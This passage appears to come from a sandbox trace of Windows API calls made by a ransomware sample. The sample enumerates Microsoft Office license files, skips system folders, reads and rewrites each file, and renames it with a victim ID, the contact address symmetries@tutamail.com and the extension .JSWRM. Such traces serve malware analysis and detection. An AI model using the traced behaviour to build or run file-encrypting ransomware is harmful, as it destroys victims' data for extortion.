cAlternateFileName="PED17F~1.XRM")) returned 1 [0106.770] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0106.770] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0106.770] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0106.770] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0106.770] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.771] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.771] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.771] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.771] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.771] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0106.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0106.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0106.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0106.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0106.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0106.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0106.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0106.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.772] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21125) returned 1 [0106.772] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5280) returned 0x24c1d0 [0106.772] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5280, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5280, lpOverlapped=0x0) returned 1 [0106.774] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.774] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5280, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5280, lpOverlapped=0x0) returned 1 [0106.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.774] CloseHandle (hObject=0x45c) returned 1 [0106.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0106.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0106.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0106.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0106.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0106.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0106.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.775] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0106.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0106.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0106.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.776] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe814776f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe814776f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe82527fc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d86, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="PEE158~1.XRM")) returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.776] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0106.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0106.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0106.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0106.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0106.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0106.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d298, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0106.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0106.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0106.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0106.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0106.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.777] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11654) returned 1 [0106.777] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0106.777] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0106.779] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.780] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0106.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.780] CloseHandle (hObject=0x45c) returned 1 [0106.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0106.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0106.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0106.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0106.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0106.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0106.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.780] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0106.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0106.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0106.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.781] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7ee51d1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7ee51d1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7fa3d85, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51cd, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalPipcR_Grace-ppd.xrm-ms", cAlternateFileName="PERSON~1.XRM")) returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.781] lstrcmpiW (lpString1="PersonalPipcR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0106.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0106.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0106.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.782] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20941) returned 1 [0106.782] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51c0) returned 0x24c1d0 [0106.783] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51c0, lpOverlapped=0x0) returned 1 [0106.785] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.785] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51c0, lpOverlapped=0x0) returned 1 [0106.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.785] CloseHandle (hObject=0x45c) returned 1 [0106.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0106.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0106.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.786] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 